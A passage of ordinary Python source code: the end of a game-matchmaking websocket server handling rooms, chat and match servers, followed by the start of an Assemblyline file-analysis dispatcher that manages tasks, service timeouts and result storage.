room_infos[roomid] = {
'players': all_room[index][GlobalVar.sql_roomlist_PlayerNumber],
'ico': room_config_decode['ico'],
'title': room_config_decode['title'],
'text': room_config_decode['text'],
'maps': room_config_decode['maps']
}
result['roomlist'] = json.dumps(room_infos)
return json.dumps(result)
def reflush_room_config(roomlist_data):
result = {
'msgType': 'reflush_room_config',
'config': {},
'public': 1,
'success': 1
}
room_config_decode = api_process.process_playerlist_decode(
roomlist_data[0][GlobalVar.sql_roomlist_config])
result['config'] = json.dumps(room_config_decode)
result['public'] = roomlist_data[0][GlobalVar.sql_roomlist_public]
return json.dumps(result)
def map_sec_check(maps):
know_maps = {'de_dust2': 1, 'de_inferno': 1, 'de_nuke': 1, 'de_mirage': 1,
'de_overpass': 1, 'de_cache': 1, 'de_train': 1, 'de_cbble': 1}
for index in range(len(maps)):
if not maps[index] in know_maps:
return False
return True
def checkmatchserver(matchid,roomid):
result = {
'msgType': 'heartbeat_match',
'success': 1
}
if matchid == '':
return json.dumps(result)
check = GlobalVar.runSQL('SELECT * FROM matching WHERE `matchid` = %s limit 1', matchid)
if not check:
return json.dumps(result)
start_time = check[0][GlobalVar.sql_matching_uptime]
end_time = datetime.datetime.now()
sec = (end_time - start_time).seconds
if sec < 60:
return json.dumps(result)
else:
serverid = check[0][GlobalVar.sql_matching_serverid]
team_blue_roomid = api_process.process_playerlist_decode(check[0][GlobalVar.sql_matching_team_blue])
team_red_roomid = api_process.process_playerlist_decode(check[0][GlobalVar.sql_matching_team_red])
all_roomid = team_red_roomid + team_blue_roomid
GlobalVar.runSQL("update matchserver set `matching` = 3 where `serverID` = %s limit 1", serverid)
GlobalVar.runSQL("delete from matching where `matchid` = %s limit 1", matchid)
for index in range(len(all_roomid)):
GlobalVar.runSQL(
"update roomlist set `ingame` = 0 where `RoomID` = %s limit 1", all_roomid[index])
send_match_server_crash(all_roomid[index])
return json.dumps(result)
def get_match_info(roomid):
result = {
'msgType': 'get_match_infos',
'ingame': 1,
'matchid': '',
'map': '',
'serverid': '',
'server_location': '',
'team_blue_players': [],
'team_red_players': [],
'ipaddr': '',
'port': 27015,
'elo': '0',
'success': 0
}
check = GlobalVar.runSQL(
'SELECT * FROM userdata WHERE `roomid` = %s LIMIT 1', roomid)
if not check:
return json.dumps(result)
matchid = check[0][GlobalVar.sql_userdata_matching]
if matchid == '0':
result['success'] = 1
result['ingame'] = 0
return json.dumps(result)
check = GlobalVar.runSQL(
'SELECT * FROM matching WHERE `matchid` = %s LIMIT 1', matchid)
if not check:
return json.dumps(result)
result['success'] = 1
result['matchid'] = matchid
result['map'] = check[0][GlobalVar.sql_matching_map]
result['serverid'] = check[0][GlobalVar.sql_matching_serverid]
result['team_blue_players'] = check[0][GlobalVar.sql_matching_team_blue_players]
result['team_red_players'] = check[0][GlobalVar.sql_matching_team_red_players]
server_info = GlobalVar.runSQL(
'SELECT * FROM matchserver WHERE `serverID` = %s LIMIT 1', result['serverid'])
result['ipaddr'] = server_info[0][GlobalVar.sql_matchserver_ip]
result['server_location'] = server_info[0][GlobalVar.sql_matchserver_location]
result['port'] = server_info[0][GlobalVar.sql_matchserver_port]
return json.dumps(result)
def up_room_info(data, roomlist_data, name):
result = {
'msgType': 'up_room_info',
'name': name,
'roomid': '',
'success': 1
}
sec_key = data['key']
result['roomid'] = roomlist_data[0][GlobalVar.sql_roomlist_RoomID]
room_config_decode = api_process.process_playerlist_decode(
roomlist_data[0][GlobalVar.sql_roomlist_config])
if not map_sec_check(data['maps']):
return
if not data['maps']:
return
if not is_number(data['public']):
return
# 放长一点
if len(data['title']) > 9 or len(data['text']) > 30:
return
# ico
# public
room_config_decode['title'] = htmlescape(data['title'])
room_config_decode['text'] = htmlescape(data['text'])
room_config_decode['maps'] = data['maps']
room_config_decode['public'] = data['public']
room_config_encode = api_process.process_playerlist_encode(
room_config_decode).decode(encoding='GBK')
GlobalVar.runSQL('UPDATE roomlist SET `config` = %s,`public` = %s WHERE `RoomID` = %s LIMIT 1',
(room_config_encode, data['public'], roomlist_data[0][GlobalVar.sql_roomlist_RoomID]))
GlobalVar.runSQL(
'UPDATE userdata SET `roomconfig` = %s WHERE `Key` = %s LIMIT 1', (room_config_encode, sec_key))
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json.dumps(json_encode))
return
def send_chat(text,roomid):
result = {
'msgType': 'send_chat',
'success': 1
}
text_encode = htmlescape(text)
result_push = {
'msgType': 'chat_reve',
'name': text_encode,
'roomid': roomid,
'success': 1
}
json_encode = api_process.process_playerlist_encode(
result_push).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json.dumps(json_encode))
return json.dumps(result)
def redis_listen():
redis_connect = GlobalVar.get_value('g_redis_server')
redis_pubsub = redis_connect.pubsub()
redis_pubsub.subscribe('room')
for msg in redis_pubsub.listen():
if msg['type'] == 'message':
result = {
'msgType': 'null',
'name': 'null',
'success': 1
}
try:
json_decode = api_process.process_playerlist_decode(
msg['data'])
result['msgType'] = json_decode['msgType']
result['name'] = json_decode['name']
check = GlobalVar.runSQL(
'SELECT * FROM userdata WHERE `roomid` = %s', json_decode['roomid'])
if check:
for index in range(len(check)):
if json_decode['msgType'] == 'join_room' or json_decode['msgType'] == 'leave_room':
if check[index][GlobalVar.sql_userdata_username] == json_decode['name']:
continue
key = check[index][GlobalVar.sql_userdata_Key]
obj_websocket = websocket_find(key)
#if check[0][GlobalVar.sql_userdata_banned]:
# return obj_websocket.close()
if obj_websocket:
obj_websocket.send(json.dumps(result))
if result['msgType'] == 'kick':
GlobalVar.runSQL(
"UPDATE userdata SET `roomid` = '0' WHERE `Key` = %s LIMIT 1", key)
except:
continue
class websocket_main(WebsocketConsumer):
def connect(self):
if not GlobalVar.get_value('g_init_redis'):
threading.Thread(target=redis_listen, args=()).start()
GlobalVar.set_value('g_init_redis', True)
self.accept()
def disconnect(self, close_code):
try:
if self.sec_key:
api_process.process_exit_room(self.sec_key)
websocket_del(self.sec_key)
except:
pass
def receive(self, text_data):
result = {
'msgType': 'get_room_info',
'uFuck': 1,
'RoomID': 'NULL',
'playerlist': 'NULL',
'is_ingame': 0,
'is_search': 0,
'player_num': 0,
'freezetime': 0,
'success': 0
}
if text_data == 'ping':
return self.send('pong')
# 这里要加try
if True:
data = json.loads(text_data)
if 'key' in data:
sec_key = data['key']
user_data = api_process.process_getdata_by_key(sec_key)
if not user_data:
return self.send(json.dumps(result))
if user_data[0][GlobalVar.sql_userdata_roomid] == '0':
return self.send(json.dumps(result))
roomlist_data = GlobalVar.runSQL(
'SELECT * FROM roomlist WHERE `RoomID` = %s LIMIT 1', (user_data[0][GlobalVar.sql_userdata_roomid]))
if not roomlist_data:
return self.send(json.dumps(result))
if user_data[0][GlobalVar.sql_userdata_banned]:
result['success'] = 1
result['msgType'] = 'banned'
return self.send(json.dumps(result))
self.sec_key = data['key']
self.room_id = user_data[0][GlobalVar.sql_userdata_roomid]
websocket_add(data['key'], self)
username = user_data[0][GlobalVar.sql_userdata_username]
if data['request'] == 'get_room_info':
result['success'] = 1
result['uFuck'] = 0
result['playerlist'] = roomlist_data[0][GlobalVar.sql_roomlist_PlayerList]
result['is_ingame'] = roomlist_data[0][GlobalVar.sql_roomlist_ingame]
result['is_search'] = roomlist_data[0][GlobalVar.sql_roomlist_StartSearch]
result['RoomID'] = user_data[0][GlobalVar.sql_userdata_roomid]
result['player_num'] = roomlist_data[0][GlobalVar.sql_roomlist_PlayerNumber]
return self.send(json.dumps(result))
if data['request'] == 'room_do_ready':
result['playerlist'] = 'null'
ban_time = user_data[0][GlobalVar.sql_userdata_match_ban]
if ban_time != '0':
end_time = datetime.datetime.now()
start_time = string_toDatetime(ban_time)
sec = (end_time - start_time).seconds
if sec <= 1800:
result['msgType'] = 'do_ready'
result['success'] = 1
result['uFuck'] = 3
result['freezetime'] = 1800 - sec
return self.send(json.dumps(result))
self.send(search_process.do_ready(
self, data, roomlist_data, user_data))
return send_player_ready(user_data[0][GlobalVar.sql_userdata_roomid], username)
if data['request'] == 'rand_get_room':
return self.send(get_rand_roomlist())
if data['request'] == 'get_room_players_number':
return self.send(get_players_by_id(data['other']))
if data['request'] == 'up_room_infos':
up_room_info(data, roomlist_data, username)
return
if data['request'] == 'reflush_room_config':
return self.send(reflush_room_config(roomlist_data))
if data['request'] == 'exit_room':
return self.disconnect(0)
if data['request'] == 'getMatchInfo':
return self.send(get_match_info(self.room_id))
if data['request'] == 'heartbeat_match':
return self.send(checkmatchserver(data['matchid'],self.room_id))
if data['request'] == 'send_chat':
return self.send(send_chat(data['other'], self.room_id))
return self.send(json.dumps(result))
# except:
# return self.send(json.dumps(result))
|
dispatch.py
|
#!/usr/bin/env python
import logging
import os
import psutil
import riak
import signal
import socket
import threading
import time
from collections import namedtuple
from copy import deepcopy
from pprint import pformat
from assemblyline.common import net
from assemblyline.common.exceptions import get_stacktrace_info
from assemblyline.common.isotime import now_as_iso
from assemblyline.common.net import get_hostip, get_hostname, get_mac_address
from assemblyline.al.common import forge
from assemblyline.al.common import counter
from assemblyline.al.common import message
from assemblyline.al.common.queue import CommsQueue, DispatchQueue, LocalQueue, NamedQueue, reply_queue_name
from assemblyline.al.common.remote_datatypes import ExpiringSet, Hash, ExpiringHash
from assemblyline.al.common.task import Task
from assemblyline.al.core.datastore import compress_riak_key
config = forge.get_config()
persistent = {
'db': config.core.redis.persistent.db,
'host': config.core.redis.persistent.host,
'port': config.core.redis.persistent.port,
}
Classification = forge.get_classification()
DONE = len(config.services.stages) + 1
counts = None # Created when dispatcher starts.
log = logging.getLogger('assemblyline.dispatch')
class DispatchException(Exception):
pass
Entry = namedtuple('Entry', ['dispatcher', 'task', 'retries', 'parents',
'completed_children', 'extracted_children', 'outstanding_children',
'acknowledged_services', 'completed_services', 'dispatched_services',
'outstanding_services'])
Timeout = namedtuple('Timeout', ['sid', 'srl', 'data', 'time'])
def eligible_parent(service_manager, task):
if not isinstance(task.eligible_parents, list) or not task.service_name:
return True
eligible_parents = service_manager.expand_categories(task.eligible_parents)
if task.service_name in eligible_parents:
return True
return False
def CreateEntry(dispatcher, task, now):
parent = None
psrl = task.psrl
sid = task.sid
srl = task.srl
if not psrl:
if task.quota_item and task.submitter:
log.info(
"Submission %s counts toward quota for %s",
sid, task.submitter
)
Hash('submissions-' + task.submitter, **persistent).add(
sid, now_as_iso()
)
else:
# This task has a parent.
try:
parent = dispatcher.entries[sid][psrl]
parent_task = parent.task
# Child inherits parent's selected (and skipped) services
# + any specifically added by the child.
task.selected = (task.selected or []) + \
(parent_task.selected or []) + (parent_task.skipped or [])
if eligible_parent(dispatcher.service_manager, task):
# Child inherits parent's excluded services
# + any specifically excluded by the child.
task.excluded = (task.excluded or []) + \
(parent_task.excluded or [])
else:
task.excluded = task.selected
except KeyError:
# Couldn't find parent. It might have been filtered out.
dispatcher.debug("Couldn't find parent (%s) of %s/%s",
psrl, sid, srl)
return None
# Create acked, completed, dispatched and outstanding service structures.
a, c, d, o = dispatcher.service_manager.determine_services(task, now)
# Make sure the initial score is set to 0.
task.score = 0
task.max_score = 0
# Tuples are immutable so we have to store the entry's stage on the task.
task.stage = 0
entry = Entry(dispatcher, task, {}, [], {}, {}, {}, a, c, d, o)
if parent:
# Set up parent/child links.
entry.parents.append(parent)
if not srl in parent.outstanding_children and \
not srl in parent.completed_children:
parent.outstanding_children[srl] = entry
return entry
def RemoveEntry(dispatcher, entry, sid, srl, now):
# The only way for a task to be complete is for all its children
# to be complete. This means we can remove a completed task because
# there are, by definition, no outstanding children.
entries = dispatcher.entries
files = entries.get(sid, {})
if files.pop(srl, None):
dispatcher.completed[sid][srl] = entry.task.classification
parents = entry.parents
if parents:
dispatcher.debug("Child completed: %s/%s", sid, srl)
# Move to completed_children on parent(s) and update parent(s).
for p in parents:
o = p.outstanding_children.pop(srl, None)
if o:
p.completed_children[srl] = o
UpdateEntry(p, now)
else:
dispatcher.debug("Parent completed: %s/%s", sid, srl)
task = entry.task
sid = task.sid
dispatcher.storage_queue.push({
'type': 'complete',
'expiry': task.__expiry_ts__,
'filescore_key': task.scan_key,
'now': now,
'psid': task.psid,
'score': int(dispatcher.score.get(sid, None) or 0),
'sid': sid,
})
# If there are outstanding srls, return.
if len(files):
return
if task.quota_item and task.submitter:
log.info(
"Submission %s no longer counts toward quota for %s",
sid, task.submitter
)
Hash('submissions-' + task.submitter, **persistent).pop(sid)
# If there are no outstanding srls, remove this sid as well.
entries.pop(sid)
# Update the scan object.
c12ns = dispatcher.completed.pop(sid).values()
classification = Classification.UNRESTRICTED
for c12n in c12ns:
classification = Classification.max_classification(
classification, c12n
)
results = dispatcher.results.pop(sid, [])
errors = dispatcher.errors.pop(sid, [])
raw = None
if task.completed_queue:
raw = deepcopy(task.raw)
raw.update({
'errors': errors,
'results': results,
'error_count': len(set([x[:64] for x in errors])),
'file_count': len(set([x[:64] for x in errors + results])),
})
dispatcher.storage_queue.push({
'type': 'finalize',
'classification': classification,
'completed_queue': task.completed_queue,
'errors': errors,
'results': results,
'score': int(dispatcher.score.pop(sid, None) or 0),
'sid': sid,
'watchers': dispatcher.watchers.pop(sid, {}),
'raw': raw,
})
return
def UpdateEntry(entry, now):
dispatcher = entry.dispatcher
task = entry.task
sid = task.sid
srl = task.srl
stage = task.stage
acknowledged_services = entry.acknowledged_services
dispatched_services = entry.dispatched_services
outstanding_services = entry.outstanding_services
# Move to the next stage if task's current stage is complete.
while not stage or stage != DONE \
and not acknowledged_services[stage] \
and not dispatched_services[stage] \
and not outstanding_services[stage]:
stage += 1
task.stage = stage
# Check if any and all children are complete for this task.
if stage == DONE:
counts.increment('dispatch.files_completed')
ExpiringSet(task.get_tag_set_name()).delete()
ExpiringHash(task.get_submission_tags_name()).delete()
if entry.outstanding_children or entry.extracted_children:
return False
# TODO: Insert sanity checks.
# This file is done.
if dispatcher.score[sid] is None or task.score > dispatcher.score[sid]:
dispatcher.score[sid] = task.score
else:
task.score = dispatcher.score[sid]
# raw = None
# if task.completed_queue and not task.psrl:
# results = dispatcher.results.get(sid, [])
# errors = dispatcher.errors.get(sid, [])
# raw = task.raw
# raw.update({
# 'errors': errors,
# 'results': results,
# 'error_count': len(set([x[:64] for x in errors])),
# 'file_count': len(set([x[:64] for x in errors + results])),
# })
# NamedQueue(task.completed_queue).push(raw)
RemoveEntry(dispatcher, entry, sid, srl, now)
return True
# This task is not done if there are dispatched services.
if dispatched_services[stage]:
return False
# Dispatch.
dispatched_services[stage] = to_dispatch = outstanding_services[stage]
entry.outstanding_services[stage] = {}
entry.dispatcher.debug("%s is now stage %d", task.srl, stage)
for service in to_dispatch.itervalues():
entry.dispatcher.debug("Dispatching %s to: %s", task.srl, service.name)
entry.dispatcher.dispatch(service, entry, now)
return False
q = DispatchQueue()
class Dispatcher(object):
# Instead of having a dynamic dict, __slots__ defines a static structure.
# Access to member variables defined in this way is more efficient (but
# as a side effect we lose the ability to add members dynamically).
__slots__ = ('ack_timeout', 'child_timeout', 'completed', 'control_queue',
'debug', 'drain', 'entries', 'errors', 'high', 'ingest_queue',
'last_check', 'lock', 'pop', 'queue_size', 'response_queue',
'results', 'running', 'score', 'service_manager',
'service_timeout', 'shard', 'storage_queue',
'watchers', 'hostinfo')
def __init__(self, service_manager, #pylint: disable=R0913
control_queue=None, debug=False,
high=config.core.dispatcher.max.inflight/config.core.dispatcher.shards,
pop=forge.get_dispatch_queue().pop,
shard='0'):
if debug:
self.debug = log.info
else:
self.debug = lambda *msg: None
self.hostinfo = {
'ip:': get_hostip(),
'mac_address': get_mac_address(),
'host': get_hostname(),
}
self.ack_timeout = {}
self.child_timeout = {}
self.completed = {}
self.control_queue = control_queue or \
forge.get_control_queue('control-queue-' + shard)
self.drain = False
self.entries = {}
self.errors = {}
self.high = high
self.ingest_queue = 'ingest-queue-' + shard
self.last_check = 0
self.lock = threading.Lock()
self.pop = pop
self.queue_size = {}
# Reponse queues are named: <hostname>-<pid>-<seconds>-<shard>.
self.response_queue = '-'.join((socket.gethostname(), str(os.getpid()),
str(int(time.time())), shard))
self.results = {}
self.running = False
self.score = {}
self.service_manager = service_manager
self.service_timeout = {}
self.shard = shard
self.storage_queue = LocalQueue()
self.watchers = {}
log.info('Dispatcher started. Dispatching to services:{0}'.format(
[s for s in service_manager.services]))
def _service_info(self):
list_result = {}
now = time.time()
for service in self.service_manager.services.itervalues():
is_up = not self._service_is_down(service, now)
list_result[service.name] = {
'is_up': is_up,
'accepts': service.accepts,
'details': service.metadata
}
return list_result
def _service_is_down(self, service, now):
last = service.metadata['last_heartbeat_at']
return now - last > config.system.update_interval * 6
def acknowledged(self, task, now=None):
if not now:
now = time.time()
entries = self.entries
sender = task.service_name
sid = task.sid
srl = task.srl
# Make sure the entry exists.
submission = entries.get(sid, None)
if not submission:
return
entry = submission.get(srl, None)
if not entry:
return
# Mark this service as acknowledged.
stage = self.service_manager.stage_by_name(sender)
service_entry = entry.dispatched_services[stage].pop(sender, None)
if not service_entry:
return
entry.acknowledged_services[stage][sender] = service_entry
seconds = task.seconds
# Add the timeout to the end of its respective list.
service_timeout = self.service_timeout
lst = service_timeout.get(seconds, [])
lst.append(Timeout(sid, srl, sender, now + float(seconds)))
service_timeout[seconds] = lst
def check_timeouts(self, now=None):
if not now:
now = time.time()
# Make sure the right amount of time has elapsed since our last check.
if now - self.last_check < config.system.update_interval:
return
self.last_check = now
with self.lock:
try:
self.process_timeouts('acknowledged_services', now,
'Ack timeout', self.ack_timeout)
self.process_timeouts('completed_services', now,
'Service timeout',
self.service_timeout)
timeouts = self.child_timeout
for k, v in timeouts.iteritems():
start = 0
timeouts[k] = []
for t in v:
# Timeouts are added to the end of their list so
# when we reach the first non-timed out timeout,
# we are done.
if t.time >= now:
break
# Timeouts remain active (so that we don't have
# to scan for them when removing tasks that have
# completed. So it is possible for a timeout to
# refer to an id that no longer exists.
submission = self.entries.get(t.sid, None)
if submission:
entry = submission.get(t.srl, None)
if entry:
if entry.extracted_children.pop(t.data, None):
log.info('Child %s of parent %s timed out',
t.data, t.srl)
UpdateEntry(entry, now)
start += 1
# Remove processed timeouts.
timeouts[k] = v[start:] + timeouts[k]
except Exception as ex: #pylint: disable=W0703
trace = get_stacktrace_info(ex)
log.error('Problem processing timeouts: %s', trace)
def dispatch(self, service, entry, now):
task = entry.task
sid = task.sid
srl = task.srl
name = service.name
queue_size = self.queue_size[name] = self.queue_size.get(name, 0) + 1
entry.retries[name] = entry.retries.get(name, -1) + 1
if task.profile:
if entry.retries[name]:
log.info('%s Graph: "%s" -> "%s/%s" [label=%d];',
sid, srl, srl, name, entry.retries[name])
else:
log.info('%s Graph: "%s" -> "%s/%s";',
sid, srl, srl, name)
log.info('%s Graph: "%s/%s" [label=%s];',
sid, srl, name, name)
file_count = len(self.entries[sid]) + len(self.completed[sid])
# Warning: Please do not change the text of the error messages below.
msg = None
if self._service_is_down(service, now):
msg = 'Service down.'
elif entry.retries[name] > config.core.dispatcher.max.retries:
msg = 'Max retries exceeded.'
elif entry.retries[name] >= 1:
log.debug("Retry sending %s/%s to %s", sid, srl, name)
elif task.depth > config.core.dispatcher.max.depth:
msg = 'Max depth exceeded.'
elif file_count > config.core.dispatcher.max.files:
msg = 'Max files exceeded.'
if msg:
log.debug(' '.join((msg, "Not sending %s/%s to %s." % \
(sid, srl, name))))
response = Task(deepcopy(task.raw))
response.watermark(name, '')
response.nonrecoverable_failure(msg)
self.storage_queue.push({
'type': 'error',
'name': name,
'response': response,
})
return False
if service.skip(task):
response = Task(deepcopy(task.raw))
response.watermark(name, '')
response.success()
q.send_raw(response.as_dispatcher_response())
return False
# Setup an ack timeout.
seconds = min(service.timeout * (queue_size + 5), 7200)
task.ack_timeout = seconds
task.sent = now
service.proxy.execute(task.priority, task.as_service_request(name))
# Add the timeout to the end of its respective list.
ack_timeout = self.ack_timeout
lst = ack_timeout.get(seconds, [])
lst.append(Timeout(sid, srl, name, now + seconds))
ack_timeout[seconds] = lst
return True
def heartbeat(self):
while not self.drain:
with self.lock:
heartbeat = {
'shard': self.shard,
'entries': len(self.entries),
'errors': len(self.errors),
'results': len(self.results),
'resources': {
"cpu_usage.percent": psutil.cpu_percent(),
"mem_usage.percent": psutil.phymem_usage().percent,
"disk_usage.percent": psutil.disk_usage('/').percent,
"disk_usage.free": psutil.disk_usage('/').free,
},
'services': self._service_info(),
'queues': {
'max_inflight': self.high,
'control': self.control_queue.length(),
'ingest': q.length(self.ingest_queue),
'response': q.length(self.response_queue),
},
}
heartbeat['hostinfo'] = self.hostinfo
msg = message.Message(to="*", sender='dispatcher',
mtype=message.MT_DISPHEARTBEAT, body=heartbeat)
CommsQueue('status').publish(msg.as_dict())
time.sleep(1)
def interrupt(self, unused1, unused2): #pylint: disable=W0613
if self.drain:
log.info('Forced shutdown.')
self.running = False
return
log.info('Shutting down gracefully...')
# Rename control queue to 'control-<hostname>-<pid>-<seconds>-<shard>'.
self.control_queue = \
forge.get_control_queue('control-' + self.response_queue)
self.drain = True
def poll(self, n):
"""Poll for n responses/resubmissions and (max - n) submissions"""
# Process control messages.
msg = self.control_queue.pop(blocking=False)
while msg:
with self.lock:
self.process(msg)
msg = self.control_queue.pop(blocking=False)
# Grab n responses/resubmissions from our queue.
submissions = self.pop(self.response_queue, self.high)
# Grab (max - n) new submissions from our ingest queue.
n = self.high - n
if not self.drain and n > 0:
submissions += self.pop(self.ingest_queue, n)
# Process the responses/resubmissions and submissions.
# ... "for decisions and revisions which a minute will reverse" ;-)
n = len(submissions)
for submission in submissions:
with self.lock:
self.process(submission)
return n
def process(self, msg):
func = None
task = Task.wrap(msg)
if not msg:
log.warning("Got 'None' msg")
return
try:
func = self.__getattribute__(task.state)
except AttributeError:
log.warning('Unknown message type: %s', task.state)
try:
func(task)
except Exception as ex: #pylint: disable=W0703
trace = get_stacktrace_info(ex)
log.error('Problem processing %s: %s', pformat(task.raw), trace)
def process_timeouts(self, name, now, msg, timeouts):
services = self.service_manager.services
# Timeouts are stored in lists according to the timeout seconds.
for k, v in timeouts.items():
start = 0
timeouts[k] = []
for t in v:
# Timeouts are added to the end of their list so when we
# reach the first non-timed out timeout, we are done.
if t.time >= now:
break
# Timeouts remain active (so that we don't have to scan
# for them when removing tasks that have completed. So it
# is possible for a timeout to refer to an id that no
# longer exists.
if self.redispatch(name, t.sid, t.srl,
services[t.data], msg, now):
timeouts[k].append(Timeout(t.sid, t.srl, t.data, now + k))
start += 1
# Remove processed timeouts.
timeouts[k] = v[start:] + timeouts[k]
def redispatch(self, name, sid, srl, service, reason, now):
entry = None
try:
entry = self.entries[sid][srl]
except KeyError:
return False
try:
stage = self.service_manager.stage_by_name(service.name)
d = getattr(entry, name)[stage]
c = entry.completed_services[stage]
if service.name in c or d and service.name in d:
return False
log.info("%s for %s: %s/%s", reason, service.name, sid, srl)
self.dispatch(service, entry, now)
return True
except Exception as ex: #pylint: disable=W0703
trace = get_stacktrace_info(ex)
log.error("Couldn't redispatch to %s for %s/%s: %s",
service.name, sid, srl, trace)
response = Task(deepcopy(entry.task.raw))
response.watermark(service.name, '')
response.nonrecoverable_failure(trace)
self.storage_queue.push({
'type': 'error',
'name': service.name,
'response': response,
})
return False
def serviced(self, task, now=None):
if not now:
now = time.time()
entries = self.entries
sender = task.service_name
sid = task.sid
srl = task.srl
services = self.service_manager.services
stage = self.service_manager.stage_by_name(sender)
status = task.status or ''
# Make sure the entry exists.
submission = entries.get(sid, None)
if not submission:
log.debug("Couldn't find sid for: %s", task.raw)
return
entry = submission.get(srl, None)
if not entry:
log.debug("Couldn't find srl for: %s", task.raw)
return
# Move this service from dispatched to completed.
asvc = entry.acknowledged_services[stage].get(sender, None)
dsvc = entry.dispatched_services[stage].get(sender, None)
svc = asvc or dsvc
if not svc:
log.debug("Service already completed for: %s", task.raw)
return
queue_size = self.queue_size.get(sender, 0)
if queue_size:
self.queue_size[sender] = queue_size - 1
if task.profile:
log.info('%s Graph: "%s/%s" -> "%s/%s/%s";',
sid, srl, sender, srl, sender, status)
log.info('%s Graph: "%s/%s/%s" [label="%s"];',
sid, srl, sender, status, status)
if task.dispatch_queue != self.response_queue:
raise Exception("Queue is %s. Should be %s." % \
(task.dispatch_queue, self.response_queue))
# Send the cache_key to any watchers ...
cache_key = task.cache_key
if cache_key:
msg = {'status': status[:4], 'cache_key': cache_key}
for w in self.watchers.get(sid, {}).itervalues():
w.push(msg)
# ... and append it to this submission's list of cache_keys.
if status[:4] == 'FAIL':
log.debug("Service %s failed (%s): %s",
sender, status, task.message)
if status == 'FAIL_RECOVERABLE':
if self.redispatch('completed_services', sid, srl,
services[sender],
'Recoverable failure', now):
return
if cache_key:
self.errors[sid].append(cache_key)
# We don't send error keys to services. If we want to:
#compressed = compress_riak_key(cache_key, srl)
#entry.task.errors = (entry.task.errors or []) + [compressed]
else:
score = int(task.score or 0)
entry.task.score += score
if not entry.task.max_score or score > entry.task.max_score:
entry.task.max_score = score
self.debug("%s (%d) completed %s", sender, score, srl)
if cache_key:
self.results[sid].append(cache_key)
compressed = compress_riak_key(cache_key, srl)
entry.task.results = (entry.task.results or []) + [compressed]
entry.completed_services[stage][sender] = svc
self.service_manager.update_last_result_at(sender, now)
entry.acknowledged_services[stage].pop(sender, None)
entry.dispatched_services[stage].pop(sender, None)
# If the service said to drop this entry clear all services.
if not task.ignore_filtering and task.filter == 'drop':
self.debug("%s (%s) said to DROP %s", sender, stage, srl)
entry.task.filter = 'drop'
for i, s in enumerate(entry.dispatched_services):
if i > stage and s:
s.clear()
for i, s in enumerate(entry.outstanding_services):
if i > stage and s:
s.clear()
if status[:4] != 'FAIL':
# Record any children we should be seeing if we haven't.
for child in task.extracted or []:
if child[1] and \
not child[1] in entry.outstanding_children and \
not child[1] in entry.completed_children and \
not child[1] in self.completed[sid] and \
not child[1] in entries[sid]:
entry.extracted_children[child[1]] = True
# Setup a child timeout.
seconds = config.core.dispatcher.timeouts.child
# Add the timeout to the end of its respective list.
child_timeout = self.child_timeout
lst = child_timeout.get(seconds, [])
lst.append(Timeout(sid, srl, child[1], now + seconds))
child_timeout[seconds] = lst
UpdateEntry(entry, now)
def start(self):
global counts # pylint: disable=W0603
# Publish counters to the metrics sink.
counts = counter.AutoExportingCounters(
name='dispatcher-%s' % self.shard,
host=net.get_hostip(),
auto_flush=True,
auto_log=False,
export_interval_secs=config.system.update_interval,
channel=forge.get_metrics_sink(),
counter_type='dispatcher')
counts.start()
self.service_manager.start()
# This starts a thread that polls for messages with an exponential
# backoff, if no messages are found, to a maximum of one second.
minimum = -6
maximum = 0
self.running = True
threading.Thread(target=self.heartbeat).start()
for _ in range(8):
threading.Thread(target=self.writer).start()
signal.signal(signal.SIGINT, self.interrupt)
time.sleep(2 * int(config.system.update_interval))
exp = minimum
while self.running:
if self.poll(len(self.entries)):
exp = minimum
continue
if self.drain and not self.entries:
break
time.sleep(2**exp)
exp = exp + 1 if exp < maximum else exp
self.check_timeouts()
counts.stop()
def submitted(self, task, now=None):
if not now:
now = time.time()
entries = self.entries
psrl = task.psrl
sid = task.sid
srl = task.srl
if task.is_initial():
self.debug("Parent submitted: %s/%s", sid, srl)
task.depth = 0
# Stamp the task with the current time.
task.received = now
else:
if task.dispatch_queue != self.response_queue:
raise Exception("Queue is %s. Should be %s." % \
(task.dispatch_queue, self.response_queue))
try:
# If we learned about the child in the parent's response,
# remove it from the list of extracted children (it will
# now be in outstanding).
entries[sid][psrl].extracted_children.pop(srl, None)
except: #pylint: disable=W0702
pass
self.debug("Child of %s/%s submitted: %s", sid, psrl, srl)
task.depth += 1
if task.profile:
log.info('%s Graph: "%s/%s" -> "%s";',
sid, psrl, task.submitter, srl)
# Stamp this dispatcher's queue on the task to make sure
# responses and resubmissions will come to this dispatcher.
task.dispatch_queue = self.response_queue
# If this is the initial (root) submission save the scan object.
if not sid in entries:
if psrl:
# This is a child but we don't know about the parent.
log.debug("Parent (%s) does not exist for sid/srl: %s/%s",
psrl, sid, srl)
return
entries[sid] = {}
self.completed[sid] = {}
self.errors[sid] = []
self.results[sid] = []
self.score[sid] = None
submission = entries[sid]
if srl in submission or srl in self.completed.get(sid, {}):
return
entry = CreateEntry(self, task, now)
if entry is None:
return
if task.profile:
log.info('%s Graph: "%s" [label="%s"]', sid, srl,
''.join((srl[:4], '...', srl[-4:])))
submission[srl] = entry
UpdateEntry(entry, now)
# It is possible to combine a submit and watch message.
if task.watch_queue:
self.watch(task)
def watch(self, task):
queue = task.watch_queue
sid = task.sid
# Make sure this submission exists.
watchers = self.watchers.get(sid, {})
# Bail if we have a watcher with the same name for this sid.
if queue in watchers:
return
ttl = 0
try:
ttl = config.core.dispatcher.timeouts.watch_queue
except: # pylint: disable=W0702
pass
w = NamedQueue(queue, ttl=ttl)
errors = self.errors.get(sid, None)
results = self.results.get(sid, None)
if results is None and errors is None:
# TODO: Should we send UNKNOWN.
w.push({'status': 'STOP'})
return
watchers[queue] = w
self.watchers[sid] = watchers
# Send all cache keys to the newly created queue.
# Afterward they will be sent as they are received.
w.push({'status': 'START'})
if results:
w.push(*[{'status': 'OK', 'cache_key': c} for c in results])
if errors:
w.push(*[{'status': 'FAIL', 'cache_key': c} for c in errors])
def writer(self):
queue = {}
store = forge.get_datastore()
while self.running:
try:
msg = self.storage_queue.pop(timeout=1)
if not msg:
if self.drain:
break
continue
response = None
if msg['type'] == 'complete':
key = msg['filescore_key']
if key:
store.save_filescore(
key, msg['expiry'], {
'psid': msg['psid'],
'sid': msg['sid'],
'score': msg['score'],
'time': msg['now'],
}
)
elif msg['type'] == 'error':
name, response = msg['name'], msg['response']
response.cache_key = \
store.save_error(name, None, None, response)
